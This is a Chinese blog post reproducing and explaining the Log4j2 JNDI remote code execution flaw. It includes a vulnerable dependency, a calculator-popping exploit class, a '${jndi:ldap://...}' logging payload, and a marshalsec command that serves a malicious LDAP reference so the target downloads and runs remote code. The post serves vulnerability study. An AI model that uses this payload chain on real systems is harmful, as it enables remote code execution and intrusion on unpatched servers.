Log4j-2命令执行复现及分析

最新推荐文章于 2023-08-11 10:08:19 发布
最新推荐文章于 2023-08-11 10:08:19 发布
阅读量1k 收藏 1
点赞数
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46137328/article/details/121896668
版权

0x00 漏洞描述

Apache Log4j2是一个基于Java的日志记录框架。正常情况下,开发者可能会将错误信息写入日志中,可以利用此特点构造特殊的数据请求包,最终触发远程代码执行RCE漏洞。Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

0x01 受影响版本

log4j2 2.0 - log4j2 2.15.0-rc1

0x02 漏洞复现

新建maven工程,pom.xml中引入log4j2依赖:

<dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.1</version>
    </dependency>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.14.1</version>
    </dependency>

exp.java

public class exp {
    static{
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"gnome-calculator" };
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

该exp用于弹出计算器,验证命令执行效果。

test.java

import  org.apache.logging.log4j.LogManager;
import  org.apache.logging.log4j.Logger;


public class test {
    public static final Logger logger = LogManager.getLogger(test.class);


    public static void main(String[] args){
        logger.error("${jndi:ldap://192.168.65.233:9999/exp}");
    }
}

手动将exp.java生成字节码文件,并通过python搭建简易web用于外部访问:

038df5a8aaa17edcd19d8f8376f89420.png

再开一个恶意的ldap服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.65.233:9001/#exp" 9999

891b0fe6b9d4087c6da7a2bda1f6b712.png

运行test.java,可以看到ldap服务和web服务都有访问记录:

a66c51ee566bb16ff8f2ea5ccb83cf30.png

2014bf1389bb0342dee5a27e4b56ba66.png

并且有计算器弹出来,命令执行成功:

8607862006d2f1099c2b3a141abe115b.png

${jndi:ldap://qh48j1.dnslog.cn:9999/exp}这个payload高版本的java也会进行域名解析,可以看到dns请求记录:

1ddbff9bee3d7add5802c72d569b9ce5.png但是只有低版本的java才能执行命令。java版本在6u211、7u201、8u191及java11等更高版本的java中默认不能使用RMI或LDAP进行JNDI注入,因此较为安全。

0x03 漏洞分析

这次漏洞主要原因是log4j2提供的Lookup的功能,对于要输出的日志,提供了很多种查找的途径,JNDI只是其中一种。JDNI支持命名引用的方式,通过远程下载class文件来构建对象,最终造成命令执行。

这是目前JNDI Lookup方式的介绍:

b2ab60b050214b2a96ebb459c806b10a.png

其中增加了对来源class的限制。

0x04 最后

10号一早看到POC,拖到现在才发确实有些不好意思。

长按下方图片关注我们:

1fc73f678cba883125f5858856be9b70.jpeg

xju_lr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(CVE-2021-44228)Apache log4j 远程命令执行
weixin_45253622的博客
12-19 4038
漏洞简介 Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。 Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。此功能中也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用
漏洞复现系列:Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
最新发布
weixin_54626591的博客
05-16 109
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6331
漏洞说明 Log4j是Apache的开源日志记录组件。Log4j2Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Apache Log4j2 RCE 远程命令执行漏洞复现分析
angry_program的博客
12-18 6494
Apache Log4j2 远程代码执行漏洞。由于Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文主要复现漏洞过程和研究漏洞原理。
Log4j2远程命令执行(CVE-2021-44228)
qq_40646572的博客
05-12 1415
我采用的是较为简单便捷的方法进行复现,全程只是使用了JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,另外,还可以使用ysoserial-0.0.6-SNAPSHOT-all.jar以及marshalsec-0.0.3-SNAPSHOT-all.jar。使用jndi注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar ,进行rmi注入。启动服务后,进入主页面,点击页面中的?链接,跳转到,目标地址。及时升级log4j组件。
【实战】log4j2远程命令执行漏洞利用姿势汇总
mingyqf的博客
09-24 1127
原文链接:https://www.cnblogs.com/peterpan0707007/p/15772359.html。
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4jlog4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压...
log4j-api-2.17.1.jar和log4j-core-2.17.1.jar
03-11
在2021年底,Log4j2被发现存在一个严重漏洞(CVE-2021-44228),这个远程代码执行(RCE)漏洞允许攻击者通过构造特定的日志输入来执行任意代码。及时升级到2.17.1版本可以避免这个问题,因为此版本包含了针对该漏洞的...
log4j-2.18.0
08-04
然而,这次的2.0及以上版本的log4j2中发现的安全漏洞,使得恶意用户能够通过精心构造的输入,触发JNDI(Java Naming and Directory Interface)查找,进而执行任意远程代码。 Log4Shell漏洞的核心在于log4j2的...
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
此次提及的`log4j-api-2.12.4.jar`和`log4j-core-2.12.4.jar`是Log4j 2框架的两个关键组件,版本号为2.12.4,这个版本主要修复了之前版本中可能存在的安全漏洞。 **log4j-api-2.12.4.jar** 是Log4j 2框架的API模块...
apache-log4j-2.17.0 核心jar包
03-31
Log4j 是一个日志记录框架,Log4j 2 是对 Log4j 的升级,提供了重大改进,超越其前身 Log4j 1.x,并提供许多其它现代功能 ,例如对标记的支持、使用查找的属性替换、lambda 表达式与日志记录时无垃圾等。 Apache ...
vulfocus复现Log4j2远程命令执行2
woai_zhongguo的博客
07-15 752
Log4j2远程命令执行2复现过程
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 319
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。
Log4j2远程命令执行复现
qq_18811919的博客
04-04 553
本篇文章讲解了Log4j2的常见利用手法,该漏洞影响的范围非常大在护网中经常会使用重大漏洞Get WebShell后续攻击内网横向移动拿到靶标,后续我会推出李同学红队仿真靶场尽可能的还原护网场景感兴趣的朋友关注下。
Log4j2远程命令执行(cve-2021-44228)复现
qq_39191052的博客
12-29 3664
目录 用vulfocus docker漏洞环境 漏洞复现-获取shell 用vulfocus docker漏洞环境 docker pull vulfocus/log4j2-rce-2021-12-09:latest ​ docker run -p 8080:8080 -d --name log4j2-rce vulfocus/log4j2-rce-2021-12-09 漏洞位置就是在 /hello。路径,请求方式POST 参数 payload。 漏洞复现-获取shell ...
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
m0_52701599的博客
04-06 2894
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
Log4j2使用
new03的专栏
08-25 403
使用log4j 2基本只需导入两个jar包: log4j-core-xx.jar     log4j-api-xx.jar   log4j 2.0与以往的1.x有一个明显的不同,其配置文件只能采用.xml, .json或者 .jsn。在默认情况下,系统选择configuration文件的优先级如下:(classpath为scr文件夹) 1.classpath下名为 log4j-test...
log4j2远程代码执行漏洞复现
liangbo7的博客
12-11 5179
log4j2远程代码执行漏洞复现-rmi方式代码侵入
Apache Log4j任意代码执行漏洞EXP(任意命令执行 window和Linux)
weixin_48170459的博客
12-13 5278
声明:本程序仅教学使用,由于使用本程序攻击网站所造成的后果由读者本人承担 百度云链接:https://pan.baidu.com/s/1cB2ffoWiVti3Ve_ZM73-cA 提取码:nexu 仅测试Linux版本,Windows未测试,服务占用端口为8100和1389,个人推荐使用模式1 测试环境: java:版本 python版本 需要的python包 测试网站环境:Linux 使用方法: 1,运行 javac test1.java编译程序 2,java test1 运行程序 本程序有两种模式
log4j-bom+和log4j-core
12-14
BOM文件中包含了log4j-api和log4j-core的版本信息,您只需要在项目中引入log4j-bom依赖,就可以使用其中定义的log4j版本,而无需在每个模块中单独指定版本号。 log4j-core是log4j的核心组件,提供了日志记录的基本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值